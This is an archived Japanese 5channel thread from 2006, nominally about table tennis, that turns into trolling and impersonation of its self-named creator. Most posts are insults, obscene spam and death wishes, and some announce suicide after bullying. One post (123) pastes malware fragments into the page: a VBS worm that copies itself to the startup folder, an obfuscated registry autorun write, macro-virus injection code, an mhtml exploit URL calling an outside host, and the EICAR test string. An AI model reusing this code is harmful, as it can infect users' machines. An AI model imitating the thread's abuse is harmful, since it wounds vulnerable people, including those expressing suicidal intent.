5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

よろしく卓球雑談掲示板

1 :よろしく卓球:2006/11/04(土) 22:28:23 ID:nShWkn3J
たてちゃった!

2 :名無しQ(・∀・)ノ゜サァン!!:2006/11/04(土) 22:29:08 ID:R8U/szNs
こりねえ奴だな・・・・・・

3 :よろしく卓球:2006/11/04(土) 22:31:56 ID:nShWkn3J
>>2
なんでもしってるようなくちきくなや!
うえからみくだしたもののいいかたやめれや〜?

4 :名無しQ(・∀・)ノ゜サァン!!:2006/11/04(土) 23:31:13 ID:4H03la1b
>>3
なんでもしってるようなくちきくなや!
うえからみくだしたもののいいかたやめれや〜?

5 :名無しQ(・∀・)ノ゜サァン!!:2006/11/05(日) 13:26:02 ID:vlyTsBTy
自分が作ったスレを削除or1000レス達成させてから、新しい陀スレを作れwww

6 :よろしく卓球:2006/11/05(日) 16:50:27 ID:QLMFsaEA
>>5
なんでめいれいするいみわからん!!
一人ではなにもできない無能なオタくめ!わははははーわーははは

7 :名無しQ(・∀・)ノ゜サァン!!:2006/11/05(日) 16:53:29 ID:tSIm//YR
>>6
なんでめいれいするいみわからん!!
一人ではなにもできない無能なオタくめ!わははははーわーははは

8 :名無しQ(・∀・)ノ゜サァン!!:2006/11/05(日) 17:28:15 ID:fv0dOA7k
>>3
いや、書いた当人が普通に書いていても、よろしく卓球がいる位置が低い
ので、自然と上から見下した状態になってしまうのではないか。

位置が低い側にも責任があると思う。

9 :よろしく卓球:2006/11/05(日) 17:30:16 ID:QLMFsaEA
>>8
ここはエロスレじゃないよ〜ん〜エスケーセブン!
おまえいまずぼんぬいでただろ?(笑)

10 :名無しQ(・∀・)ノ゜サァン!!:2006/11/05(日) 17:34:24 ID:x+u6pqpI
とりあえず アフォはスルーと言うことで

11 :名無しQ(・∀・)ノ゜サァン!!:2006/11/05(日) 18:55:39 ID:W/TTauSh
よろしく卓球さん。よろしくお願いします。

12 :名無しQ(・∀・)ノ゜サァン!!:2006/11/05(日) 18:59:31 ID:FK9IZhLf
こんなスレはこうしなくちゃ。
駄駄駄駄駄糞駄駄駄駄駄駄駄駄糞糞糞駄駄駄駄駄駄駄駄駄
駄駄駄駄駄■■糞駄駄駄駄駄駄糞■糞駄駄駄駄駄駄駄駄駄
駄駄駄駄糞■■駄駄駄駄駄駄駄■■糞駄駄駄駄駄駄駄駄駄
駄駄駄糞■■糞駄駄駄駄駄駄糞■■糞糞糞糞■■糞駄駄駄
駄駄駄■■■駄駄糞糞駄駄駄糞■■■■■■■■■糞駄駄
駄糞糞■■糞駄糞■■糞駄糞■■糞糞糞糞糞■■■駄駄駄
糞■■■■糞糞■■糞駄駄糞■■■駄駄駄糞■■糞駄駄駄
糞■■■■糞糞■糞駄駄糞■■糞■糞駄糞■■■駄駄駄駄
駄糞■■■■■■糞駄糞■■糞糞■■糞■■■糞駄駄駄駄
駄駄糞■■■■糞糞駄糞■糞駄駄糞■■■■糞駄駄駄駄駄
駄駄駄糞■■糞糞■糞駄糞駄駄駄駄糞■■■駄駄駄駄駄駄
駄駄駄糞■■駄駄■■糞駄駄駄駄駄糞■■糞糞駄駄駄駄駄
糞糞糞■■■糞■■■■糞駄駄糞糞■■■■■糞駄駄駄駄
■■■■■■■■糞■■糞糞■■■■糞■■■■■■糞糞
■■糞糞糞■■駄駄糞糞■■■■糞糞駄駄糞■■■■■糞
糞糞糞駄駄■■駄糞糞糞■■■糞糞■糞糞糞糞■■■■糞
駄■■■糞■■糞■■糞■■糞駄糞■■■■糞糞糞糞糞駄
駄■■■糞■■糞■■糞糞糞駄駄糞■■■■■■糞駄駄駄
駄■■■糞■■駄糞■■駄駄駄駄駄糞糞■■■■糞駄駄駄
糞■■■駄■■駄糞■■糞駄駄糞駄駄駄糞■■糞駄駄駄駄
糞■■■駄■■駄糞■■糞駄糞■■糞糞糞駄駄駄駄駄駄駄
糞■■糞駄■■駄駄■■糞駄糞■■■■■糞糞駄駄駄駄駄
糞■■糞駄■■糞駄糞糞駄駄糞■■■■■■■■糞糞駄駄
糞■■糞駄■■糞駄駄駄駄駄駄糞糞■■■■■■■糞駄駄
駄駄駄駄駄■■糞駄駄駄駄駄駄駄駄駄糞■■■■■糞駄駄
駄駄駄駄駄■■糞駄駄駄駄駄駄駄駄駄駄駄糞糞糞糞駄駄駄
駄駄駄駄駄糞駄駄駄駄駄駄駄駄糞糞糞駄駄駄駄駄駄駄駄駄
駄駄駄駄駄■■糞駄駄駄駄駄駄糞■糞駄駄駄駄駄駄駄駄駄
駄駄駄駄糞■■駄駄駄駄駄駄駄■■糞駄駄駄駄駄駄駄駄駄
駄駄駄糞■■糞駄駄駄駄駄駄糞■■糞糞糞糞■■糞駄駄駄
駄駄駄■■■駄駄糞糞駄駄駄糞■■■■■■■■■糞駄駄
駄糞糞■■糞駄糞■■糞駄糞■■糞糞糞糞糞■■■駄駄駄
糞■■■■糞糞■■糞駄駄糞■■■駄駄駄糞■■糞駄駄駄
糞■■■■糞糞■糞駄駄糞■■糞■糞駄糞■■■駄駄駄駄
駄糞■■■■■■糞駄糞■■糞糞■■糞■■■糞駄駄駄駄
駄駄糞■■■■糞糞駄糞■糞駄駄糞■■■■糞駄駄駄駄駄
駄駄駄糞■■糞糞■糞駄糞駄駄駄駄糞■■■駄駄駄駄駄駄
駄駄駄糞■■駄駄■■糞駄駄駄駄駄糞■■糞糞駄駄駄駄駄
糞糞糞■■■糞■■■■糞駄駄糞糞■■■■■糞駄駄駄駄
■■■■■■■■糞■■糞糞■■■■糞■■■■■■糞糞
■■糞糞糞■■駄駄糞糞■■■■糞糞駄駄糞■■■■■糞
糞糞糞駄駄■■駄糞糞糞■■■糞糞■糞糞糞糞■■■■糞
駄■■■糞■■糞■■糞■■糞駄糞■■■■糞糞糞糞糞駄
駄■■■糞■■糞■■糞糞糞駄駄糞■■■■■■糞駄駄駄
駄■■■糞■■駄糞■■駄駄駄駄駄糞糞■■■■糞駄駄駄
糞■■■駄■■駄糞■■糞駄駄糞駄駄駄糞■■糞駄駄駄駄
糞■■■駄■■駄糞■■糞駄糞■■糞糞糞駄駄駄駄駄駄駄
糞■■糞駄■■駄駄■■糞駄糞■■■■■糞糞駄駄駄駄駄
糞■■糞駄■■糞駄糞糞駄駄糞■■■■■■■■糞糞駄駄
糞■■糞駄■■糞駄駄駄駄駄駄糞糞■■■■■■■糞駄駄
駄駄駄駄駄■■糞駄駄駄駄駄駄駄駄駄糞■■■■■糞駄駄
駄駄駄駄駄■■糞駄駄駄駄駄駄駄駄駄駄駄糞糞糞糞駄駄駄



13 :よろしく卓球:2006/11/05(日) 21:32:00 ID:QLMFsaEA
ひゃばはは

あげ

14 :名無しQ(・∀・)ノ゜サァン!!:2006/11/05(日) 21:46:28 ID:X74M5ANN
よろしく卓球ってやつ頭平気?

15 :名無しQ(・∀・)ノ゜サァン!!:2006/11/05(日) 21:48:47 ID:KGu4i4O0
うわ!マジ!

16 :名無しQ(・∀・)ノ゜サァン!!:2006/11/05(日) 22:02:49 ID:BhPuzVxw
このスレッドがいっぱいになるまでには、口先卓球も2チャンに来なくなってるんだろ〜な。

17 :よろしく卓球:2006/11/05(日) 22:10:27 ID:QLMFsaEA
>>16
>>15
>>14
おまえらうざいよ
あくきんするよかすどもがぁ

18 :名無しQ(・∀・)ノ゜サァン!!:2006/11/05(日) 22:13:05 ID:BhPuzVxw
口先卓球、俺の事おぼえてるか(笑)

19 :よろしく卓球:2006/11/05(日) 22:26:09 ID:UW2zUew7
みんなも名前をよろしく卓球にしよう

20 :よろしく卓球:2006/11/05(日) 22:27:28 ID:QLMFsaEA
>>18
偽があいてしていたらわからんけど!本人ならわかる!はやくなのれ

21 :名無しQ(・∀・)ノ゜サァン!!:2006/11/05(日) 22:42:52 ID:GBMdQmHN
よろしく卓球さんって卓球に関して詳しいんですね!
きっと強い人なんだろうなぁ!すごい憧れます!

22 :名無しQ(・∀・)ノ゜サァン!!:2006/11/05(日) 22:46:20 ID:knKuTo+n
糞コテ≠糞
わかりますか?

23 :よろしく卓球:2006/11/05(日) 23:00:06 ID:QLMFsaEA
>>21
おまえうざいよ!ひはんしていればいいんだよおれを!どうせほんねはうざいって思ってるんだろ?かすが

24 :名無しQ(・∀・)ノ゜サァン!!:2006/11/05(日) 23:09:41 ID:GBMdQmHN
違いますよ!発言からして明らかに強そうな人だなぁ・・・って思って・・
確かに僕は卓球の腕は自身ありません・・すいません↓↓
よろしく卓球さんはペンドラですか??

25 :よろしく卓球:2006/11/05(日) 23:14:39 ID:QBcsjL9b
あぼーん

26 :24:2006/11/05(日) 23:15:46 ID:GBMdQmHN
すいません!気を悪くしてしまったなら謝ります!ごめんなさい・・・

27 :よろしく卓球:2006/11/05(日) 23:31:42 ID:QLMFsaEA
>>26
ウラウラシーク

28 :よろしく卓球:2006/11/05(日) 23:33:00 ID:QBcsjL9b
アク禁

29 :名無しQ(・∀・)ノ゜サァン!!:2006/11/05(日) 23:35:37 ID:xEUf1m3P
とりあへず漢字覚えたら?

30 :24:2006/11/05(日) 23:39:37 ID:GBMdQmHN
裏裏ですかぁ!なんかペンの超オールフォアって感じだったんで・・
ラケットラバーは何を使われてるんですか?

31 :よろしく卓球:2006/11/05(日) 23:45:17 ID:QLMFsaEA
>>30
あんまりゆうとばれてしまう!
いちおうゆうめいだからね 

32 :名無しQ(・∀・)ノ゜サァン!!:2006/11/05(日) 23:48:48 ID:GBMdQmHN
あっそうですよね!すいません空気読めなくて↓↓
僕は中学二年なんですけどよろしく卓球さんは高校生ですか??


33 :よろしく卓球:2006/11/05(日) 23:51:01 ID:QLMFsaEA
16〜20ってことで!
ばれてしまうからね!
まぁ中学でおれにかてるやつは一部だけだな!

34 :名無しQ(・∀・)ノ゜サァン!!:2006/11/05(日) 23:59:58 ID:GBMdQmHN
やっぱり松平くんとか野邑あたりと競ったりしちゃうんだろうなぁ・・・
僕も来年は全中でランク入りを目指します!お互い練習頑張りましょうね!

35 :名無しQ(・∀・)ノ゜サァン!!:2006/11/06(月) 00:06:15 ID:Tg9Ra+/u
松平とかのむらはきついたぶんまけるよ!せるけどねたぶん!へたしたらかつくらい!

36 :名無しQ(・∀・)ノ゜サァン!!:2006/11/06(月) 00:13:17 ID:3LnlWFuj
やっぱすごいなぁ!
野邑は昔KMSCってゆうクラブで一緒だったんで結構試合とかしたんですけど・・・まさかあそこまで強くなるとは・・・
もう今絶対勝てませんよ↓↓
とりあえず僕は全日本ジュニアでランク入んなきゃ・・・
よろしく卓球さんも全日本でますよねっ!

37 :よろしく卓球:2006/11/06(月) 00:15:02 ID:Tg9Ra+/u
でるよ!!


38 :名無しQ(・∀・)ノ゜サァン!!:2006/11/06(月) 00:19:21 ID:3LnlWFuj
ほんとですかぁ!んじゃ頑張って下さいねっ!☆★
僕もがんばろぉっと・・・
それでは明日も朝練があるので、失礼します!
おやすみなさぁい。。。


39 :名無しQ(・∀・)ノ゜サァン!!:2006/11/06(月) 01:25:53 ID:Tg9Ra+/u
あげ

40 :名無しQ(・∀・)ノ゜サァン!!:2006/11/06(月) 01:48:15 ID:AehrDox8
よろしく卓球、騙されてることに気がつけよw

41 :名無しQ(・∀・)ノ゜サァン!!:2006/11/06(月) 01:49:34 ID:AehrDox8
釣りが釣られてるよwww
だっせー

42 :よろしく卓球:2006/11/06(月) 02:31:37 ID:Tg9Ra+/u
なにが (?-?)

43 :よろしく卓球:2006/11/06(月) 03:13:35 ID:Tg9Ra+/u
みんなねたかかすどもが

44 :名無しQ(・∀・)ノ゜サァン!!:2006/11/06(月) 03:19:45 ID:AehrDox8
やっと気づいたかカスw

45 :よろしく卓球:2006/11/06(月) 07:32:39 ID:Tg9Ra+/u
>>42
ぼむるよ?にせ

46 :坊や:2006/11/06(月) 07:41:54 ID:CayQT8yV
コテの意味がわかるようになってからおいで

47 :よろしく卓球:2006/11/06(月) 17:03:32 ID:Tg9Ra+/u
>>46
あーしばきけってーい!

48 :坊や:2006/11/06(月) 18:54:33 ID:CayQT8yV
レスアンは使えるんだね。
そこにたどり着くのにどれくらいかかったの?

49 :名無しQ(・∀・)ノ゜サァン!!:2006/11/06(月) 19:01:58 ID:Q/VKeA0y
新人ですッ!
ここにいる皆さんゎ卓球が上手い人が結構いるんですね〜!!(ワラ

50 :よろしく卓球:2006/11/06(月) 19:47:30 ID:Tg9Ra+/u
>>46
だまれやかす
さぶあどさらしたらぼむったるぜ?

51 :名無しQ(・∀・)ノ゜サァン!!:2006/11/06(月) 20:01:37 ID:ibxR4thz
このスレ立てたヤツ死ねばいいのにp(^^)q

52 :よろしく卓球:2006/11/06(月) 20:04:39 ID:AQUoMCMN
かんじがかけるようになりたいよ〜カスどもめ

53 :名無しQ(・∀・)ノ゜サァン!!:2006/11/06(月) 20:06:00 ID:yJesfxmq
>>52
mj-sugomi@xxne.jp
です

54 :名無しQ(・∀・)ノ゜サァン!!:2006/11/06(月) 20:10:31 ID:xnJXGnIu
全日本レベルだったら早く寝て朝から練習してんだろうな。
じゃないと体持たないもんな。
というか強い奴は自分を強いとなんか思わない。むしろ上に目標があるから
自分の成績なんかじゃ満足しないよな。

55 :名無しQ(・∀・)ノ゜サァン!!:2006/11/06(月) 21:06:58 ID:yJesfxmq
>>52
あんたすげえな。

56 :坊や:2006/11/06(月) 21:19:22 ID:CayQT8yV
人にアドレスを聞く前に、まず自分のアドレスを載せなさいな

57 :名無しQ(・∀・)ノ゜サァン!!:2006/11/06(月) 21:30:14 ID:yJesfxmq
載せたら大変なことになった((((゜д゜;)))
メール1000件以上送ってくるよ奴

58 :名無しQ(・∀・)ノ゜サァン!!:2006/11/06(月) 21:37:03 ID:CayQT8yV
>>58
そこで通報ですよ

59 :名無しQ(・∀・)ノ゜サァン!!:2006/11/06(月) 22:48:41 ID:Tg9Ra+/u
>>58
自分で通報してなにかんがえてるね?

60 :名無しQ(・∀・)ノ゜サァン!!:2006/11/06(月) 22:58:59 ID:8ssw+5zf
>>59
日本語がおかしい模様

61 :よろしく卓球:2006/11/07(火) 20:08:46 ID:aL0XVESa
べつに模様などつけてないよかす

62 :名無しQ(・∀・)ノ゜サァン!!:2006/11/07(火) 21:01:15 ID:slsSyk4e
よろしく卓球の頭が悪すぎて見ててイライラする。

63 :名無しQ(・∀・)ノ゜サァン!!:2006/11/07(火) 21:47:44 ID:Q15THb1h
よろしく卓球は模様の意味もわからない模様

64 :名無しQ(・∀・)ノ゜サァン!!:2006/11/07(火) 22:38:24 ID:U06uB75p
でも、そんな強い人ならこんな場所来ないと思うんですけど・・
よろしく卓球さんどうなんですか?
でもこんな馬鹿な人が強いなんて信じられません

65 :名無しQ(・∀・)ノ゜サァン!!:2006/11/07(火) 22:42:02 ID:lyBx9SwK
相当強そうな(とは思ってないが)よろしく卓球。強い人はこんなところに
いないで練習するだろ。早く寝て明日の練習にそなえるんだし、
こんな時間があったらプレーの見直しとかするんじゃない?

66 :よろくし卓球:2006/11/07(火) 22:52:30 ID:vr/C2B0y
みんな、今まで横暴してごめん。
ただ寂しかっただけなんだ。
これからは誠意ある態度を取っていきたいと思う。
新生・よろしく卓球をみんなよろしく!

67 :よろしく卓球:2006/11/07(火) 23:23:46 ID:r30MndB8
だまれにせもの

68 :よろしく卓球:2006/11/07(火) 23:32:04 ID:VSVtVX6w
本物は誰だ?

69 :よろしく卓球:2006/11/07(火) 23:34:48 ID:vr/C2B0y
ここのスレだって俺が立てたんだ。
お前こそ、本物面すんな。このニセモノ

70 :よろしく卓球:2006/11/07(火) 23:36:34 ID:vr/C2B0y
>>67に対してな

71 :よろしく卓球:2006/11/08(水) 00:00:47 ID:SBhAEB0L
おれはじつはかすだったんだ

72 :よろしく卓球:2006/11/08(水) 13:42:34 ID:aP3WEp1U
おまえらまじめにしね!ふつうにぼくがほんものじゃ!
てか俺も知名度あがったぜ!ヒッキー

73 :名無しQ(・∀・)ノ゜サァン!!:2006/11/08(水) 16:06:54 ID:j2GWpQXZ
ママーパパー 朴 感じが賭けるようになったよ♪

74 :よろしく卓球:2006/11/08(水) 16:08:08 ID:j2GWpQXZ
ママーパパー 朴 感じが賭けるようになったよ♪

75 :よろしく卓球:2006/11/08(水) 16:45:35 ID:SBhAEB0L
おまえらまじしねやでもおれまじきもいからさきにしんだほうがいいのかな

76 :よろぴく卓球:2006/11/08(水) 17:22:26 ID:p7gD57g2
おれも含めてニセモノの嵐W

77 :よろしく卓球:2006/11/08(水) 18:51:56 ID:zqJwc0OV
>>72
お前いい加減にしろ
人のマネして楽しいのか?
ニセモノはさっさと出てけ!

78 :名無しQ(・∀・)ノ゜サァン!!:2006/11/08(水) 21:07:01 ID:64CuHg3x
やっぱりおれってきらわれてるよなまじかすはおれだったすまん

79 :名無しQ(・∀・)ノ゜サァン!!:2006/11/08(水) 21:12:07 ID:0X3jgXpl
ならあなたは人を見下して楽しいのですか?

仮にあなたが強い人だとします。そしたらあなたに憧れてる人が少なからずいるはずです。
あなたはその人たちに合わせる顔がありますか?

もしその実力が本物だったらその分周りから見られてるって事を自覚してください。
実力があるんだったら人を馬鹿にせずその実力を人の為に生かしてください。


あなたは自分で自分の首を絞めてるだけです。
今からでも遅くはありません。もう一度深く考え直して見てください。

80 :名無しQ(・∀・)ノ゜サァン!!:2006/11/08(水) 21:13:08 ID:0X3jgXpl
>>79>>77宛てのものです。

81 :よろしく卓球:2006/11/08(水) 21:37:22 ID:64CuHg3x
ごめんよおれじつはちく1かいせんまけのざこだいままでほんとうにすまなかった

82 :よろしく卓球:2006/11/08(水) 21:40:58 ID:zqJwc0OV
>>80
真面目に書いてくれたとこ悪いけど、
俺はニセモノ。おそらく>>72が本物。

83 :名無しQ(・∀・)ノ゜サァン!!:2006/11/08(水) 22:27:58 ID:0X3jgXpl
いえ、でもこの書き込みを本物の方が読んでくれれば幸いです。

84 :よろしくたっきゅー:2006/11/08(水) 22:29:21 ID:zfURR0ZD
ぽくかほんものね

85 :よろしく卓球:2006/11/08(水) 22:30:56 ID:aP3WEp1U
>>83
いまよんだけどむかつくのゃ!やっぱりたくさんのばかわあいてできないな!てか僕の偽やめてくださいよ!

86 :名無しQ(・∀・)ノ゜サァン!!:2006/11/08(水) 22:43:34 ID:0X3jgXpl
腹が立つのもわかります。
ですがその人たちを相手にすることによってあなた自身の人間価値が下がってしまっていることに気付きませんか?
僕から見ると本当に勿体無いことをしていると思い、書き込んでみたのですが・・・
余計なお世話だったなら謝ります。

しかし残念です・・・。

87 :よろしく卓球:2006/11/08(水) 23:17:22 ID:64CuHg3x
にせものうざいんだよおれがほんものだかす

88 :名無しQ(・∀・)ノ゜サァン!!:2006/11/09(木) 00:15:49 ID:ZRm5CJAi
くだらねえことばっかしてんじゃねえよ

89 :よろぴくたっきゅん:2006/11/09(木) 00:17:54 ID:3sxPhgqk
このスレもおわるなw

90 :名無しQ(・∀・)ノ゜サァン!!:2006/11/09(木) 12:37:56 ID:7RlEANzm
トリつけろよクズが

91 :名無しQ(・∀・)ノ゜サァン!!:2006/11/09(木) 17:31:37 ID:7WDd4j7Q
┏━━━━━━━━━━━━━┓ ┌──┐
┃  中川翔子 特設 おっぱい   ┃ │検索│
┗━━━━━━━━━━━━━┛ └──┘

        _  ∩
      ( ゚∀゚)彡 おっぱい!おっぱい!
       ⊂彡

92 :よろしく卓球:2006/11/09(木) 21:02:58 ID:gIpWeuDI
ぼくも11にちにしにます。ころしてころしてしんでやるせんせいにもいえないしみんなひどいよ

93 :よろしく哀愁:2006/11/09(木) 21:21:10 ID:vo3NXR0W
卓球逃げた?

94 :よろしく卓球:2006/11/09(木) 21:50:40 ID:gIpWeuDI
にげるわけないしねかすが

95 :よろしく卓球:2006/11/09(木) 21:58:17 ID:O41KP/3s
にせものだまれおれはしぬんだ!

96 :よろしく卓球:2006/11/09(木) 22:58:37 ID:gIpWeuDI
にせものうざいんだよおれがほんものだ

97 :名無しQ(・∀・)ノ゜サァン!!:2006/11/09(木) 23:06:14 ID:ZRm5CJAi
また同じ展開かよ

98 :よろしく卓球:2006/11/09(木) 23:14:29 ID:I6T95DDx
>>97
雑魚がまねするからおなじてんかいなるんだな!しんでくれたらいいわぁ

99 :名無しQ(・∀・)ノ゜サァン!!:2006/11/09(木) 23:49:36 ID:gIpWeuDI
しんじゃぇよろしく卓球

100 :名無しQ(・∀・)ノ゜サァン!!:2006/11/10(金) 00:08:25 ID:cpuIQhTQ
本物は?
偽者ばっかりだと逆につまんない

101 :名無しQ(・∀・)ノ゜サァン!!:2006/11/10(金) 00:22:24 ID:H4oeICtH
>>100
本物がおもしろいと申されるか







ぬふぅ

102 :よろしこ卓球:2006/11/10(金) 00:28:28 ID:xjIIh1k4
よろしく卓球 死にます

103 :よろしく卓球:2006/11/10(金) 00:53:56 ID:6Oshryvk
ぼくはゲィです。

104 :しこしこたっきゅん:2006/11/10(金) 15:46:12 ID:ypn70F+d
今日は夜のカウンタースマッシュきめます!バックスマッシュで!

105 :よろしく卓球:2006/11/10(金) 16:00:27 ID:y7o87/j2
あっ俺はほんものやけどにせがでたらこの書き込みでわかるから俺がくるまででしゃばんなよかすども

106 :名無しQ(・∀・)ノ゜サァン!!:2006/11/10(金) 16:56:12 ID:ypn70F+d
ちんぽちんぽちんぽちんぽちんぽちんぽちんぽちんぽちんぽちんぽちんぽちんぽちんぽちんぽちんぽちんぽちんぽちんぽちんぽちんぽちんぽちんぽちんぽちんぽちんぽちんぽちんぽちんぽちんぽちんぽちんぽちんぽちんぽちんぽちんぽちんぽちんぽちんぽ

107 :よろしく卓球:2006/11/11(土) 00:14:40 ID:8H/WlNIb
いじめられたのでじさつします

108 :名無しQ(・∀・)ノ゜サァン!!:2006/11/11(土) 00:28:17 ID:gkEc6KLV
もはやどれが本物かわからんな

109 :よろしく卓球:2006/11/11(土) 00:39:40 ID:as1L/t82
まんこまんこまんこまんこまんこまんこまんこまんこまんこまんこまんこまんこまんまんこまんこまんこまんこまんこまんこまんこまんこまんこまんこまんこまんこまん

110 :よろしく卓球:2006/11/11(土) 10:32:27 ID:LV67vi8E
きえろこのちんかすが

111 :名無しQ(・∀・)ノ゜サァン!!:2006/11/11(土) 11:00:52 ID:Jb7BjYBe
111アディダス

112 :名無しQ(・∀・)ノ゜サァン!!:2006/11/12(日) 00:40:29 ID:QPU9Uhrs
このスレも終わったな

113 :名無しQ(・∀・)ノ゜サァン!!:2006/11/12(日) 00:47:35 ID:Je7Qji0v
みんなさぁ 本物が現れないと叩きようがなくない?


114 :よろしく卓球:2006/11/12(日) 00:52:33 ID:nLBn5tLC
おれがみんなをたたいてるんだぜ

115 :名無しQ(・∀・)ノ゜サァン!!:2006/11/12(日) 09:50:10 ID:xkVoV2lE
つーかよろしく卓球(略してよろ卓)死んじゃえよw

116 :よろしく卓球:2006/11/12(日) 11:31:37 ID:8Iv7MCg1
ちんぽみるくちんぽみるくちんぽみるくちんぽみるくちんぽみるくちんぽみるくちんちんぽみるくちんぽみるくちんぽみるくちんぽみるくちんぽみるくちんぽみるくちんちんぽみるくちんぽみるくちんぽみるくちんぽみるくちんぽみるくちんぽみるくちん

117 :名無しQ(・∀・)ノ゜サァン!!:2006/11/13(月) 00:27:00 ID:dN1t70wr
きもいわおまえら

118 :よろしく卓球:2006/11/13(月) 17:28:21 ID:2Cfmw7it
このスレを何かのテーマで卓球について熱く語るスレにしていきませんか?

119 :名無しQ(・∀・)ノ゜サァン!!:2006/11/13(月) 18:07:28 ID:34W1FEKx
ウザい厨房をかきつづけるスレ

120 :名無しQ(・∀・)ノ゜サァン!!:2006/11/15(水) 18:29:00 ID:a0hDWJxl
このスレは終了しました…

121 :夜露死苦卓球:2006/11/15(水) 21:13:54 ID:fenjBP0+
>>120
おまえがな

122 :よろぴくたっきゅん:2006/11/16(木) 06:02:09 ID:eJ8EPaLB
おまえもな

123 :名無しQ(・∀・)ノ゜サァン!!:2006/11/16(木) 14:58:27 ID:v7H+nQkw
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

124 :よろしく卓球:2006/11/16(木) 21:56:14 ID:jvfsGVdD
どうせオレはカスさ・・・

125 :よろしく卓球:2006/11/16(木) 22:20:43 ID:jvfsGVdD
どうせオレはクソさ・・・

126 :よろしく卓球:2006/11/16(木) 22:22:23 ID:jvfsGVdD
どうせオレはバカさ・・・

127 :よろしく卓球:2006/11/17(金) 07:49:02 ID:VlSP9/qd
>>126
なにがしたん?ばかしねかすはげずらあーとねーぢゃーりーぶしね

128 :坊や:2006/11/17(金) 13:42:18 ID:vj3cjke2
なにがしたん?

なにがしたん?

なにがしたん?



日本語でお願いしますよ

129 :よろしく卓球:2006/11/17(金) 14:04:44 ID:p/ky/+Yv
>>127
偽者はうせろ!

130 :よろぴくたっきゅん:2006/11/17(金) 14:50:44 ID:QIfrFJEY
みんなニセモノ同士仲良くしようぜw

131 :よろしく卓球:2006/11/17(金) 18:32:56 ID:ustRtq+Y
ねw

132 :シコシコ卓球:2006/11/18(土) 00:06:05 ID:o/a3L7UJ
本物は死んでろよ

133 :よろしく卓球:2006/11/19(日) 16:26:15 ID:DiKnRJSe
すん

134 :名無しQ(・∀・)ノ゜サァン!!:2006/11/19(日) 21:29:34 ID:0Uso+AlU
すんすん

135 :坊や:2006/12/07(木) 21:50:43 ID:LbqXmFBx
おかえりなさい

136 :雑談掲示板:2006/12/29(金) 16:09:40 ID:qqOyuH9F
雑談掲示板
ポケモンに関する話題全

137 :よろじく卓球:2007/01/01(月) 20:42:37 ID:pCaJPZ97
あけましておめでとう
あとハンネかえたからにせおおすぎしねかすはげあーとりーぶすれいばー

24 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)